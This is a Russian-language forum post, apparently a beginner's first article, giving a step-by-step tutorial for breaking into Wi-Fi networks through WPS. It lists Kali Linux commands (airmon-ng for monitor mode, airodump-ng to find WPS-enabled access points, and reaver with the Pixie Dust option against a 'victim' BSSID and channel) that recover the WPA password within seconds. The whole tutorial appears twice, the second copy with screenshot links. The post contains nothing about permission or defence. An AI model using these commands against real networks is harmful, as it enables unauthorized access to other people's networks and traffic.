wilx
Новичок
- Статус
- offline
- Регистрация
- 30.08.2016
- Сообщения
- 9
- Репутация
- 4
Всем привет! Это моя первая статья, поэтому строго не судите.
Сегодня я расскажу вам, как можно взломать Wi-Fi по протоколу WPS.
Что же такое WPS?
WPS (Wi-Fi Protected Setup) - это стандарт, который упрощает процесс подключения клиентов к ТД (точке доступа).
А теперь, собственно, приступим к самому процессу взлома.
Я использовал дистрибутив Kali linux, поставленный на Virtual Box.
Открываем терминал, вводим:
ifconfig
Видим свой адаптер - wlan0
Далее вводим в терминале команду:
airmon-ng
Далее переводим нашу карту в режим мониторинга:
airmon-ng start wlan0
Отлично, перевели. Теперь нам надо просканить ТД, в зоне досягаемости, на наличие WPS
Вводим:
airodump-ng wlan0mon --wps
Мы видим разные ТД и информацию о них: название, bssid, каналы и прочее.
Воспользуемся встроенной программой Reaver. Вводим в терминал:
reaver -i wlan0 -b (bssid) -c (channel) -a -K 1 -vv
где,
-i - наш интерфейс (у меня он wlan0mon)
-b - вводим BSSID жертвы
-c - канал жертвы
-a - автоматически определить лучшие продвинутые опции для целевой ТД
-K - запускает PixieWPS
-vv - отображать некритические предупреждения
Жмём Enter.
Перебор начался.
Буквально, через секунд 10, мы получаем пароль от Wi-Fi
WPA PSK - это и есть пароль.
Сегодня я расскажу вам, как можно взломать Wi-Fi по протоколу WPS.
Что же такое WPS?
WPS (Wi-Fi Protected Setup) - это стандарт, который упрощает процесс подключения клиентов к ТД (точке доступа).
А теперь, собственно, приступим к самому процессу взлома.
Я использовал дистрибутив Kali linux, поставленный на Virtual Box.
Открываем терминал, вводим:
ifconfig
![CPIrsz79jdM.jpg](https://pp.vk.me/c637721/v637721042/e2a7/CPIrsz79jdM.jpg)
Видим свой адаптер - wlan0
Далее вводим в терминале команду:
airmon-ng
![ndEN_zyybWw.jpg](https://pp.vk.me/c637721/v637721042/e2b0/ndEN_zyybWw.jpg)
Далее переводим нашу карту в режим мониторинга:
airmon-ng start wlan0
![TMH4P92DKmg.jpg](https://pp.vk.me/c637721/v637721042/e2b9/TMH4P92DKmg.jpg)
Отлично, перевели. Теперь нам надо просканить ТД, в зоне досягаемости, на наличие WPS
Вводим:
airodump-ng wlan0mon --wps
![TzQZmUR54tA.jpg](https://pp.vk.me/c637721/v637721042/e2c2/TzQZmUR54tA.jpg)
![I0Y9MELPwYs.jpg](https://pp.vk.me/c637721/v637721042/e2cb/I0Y9MELPwYs.jpg)
Мы видим разные ТД и информацию о них: название, bssid, каналы и прочее.
Воспользуемся встроенной программой Reaver. Вводим в терминал:
reaver -i wlan0 -b (bssid) -c (channel) -a -K 1 -vv
где,
-i - наш интерфейс (у меня он wlan0mon)
-b - вводим BSSID жертвы
-c - канал жертвы
-a - автоматически определить лучшие продвинутые опции для целевой ТД
-K - запускает PixieWPS
-vv - отображать некритические предупреждения
![1GmEdVLp4oA.jpg](https://pp.vk.me/c637721/v637721042/e2d4/1GmEdVLp4oA.jpg)
Жмём Enter.
Перебор начался.
Буквально, через секунд 10, мы получаем пароль от Wi-Fi
![jXgfcA8ZVC0.jpg](https://pp.vk.me/c637721/v637721042/e2dd/jXgfcA8ZVC0.jpg)
WPA PSK - это и есть пароль.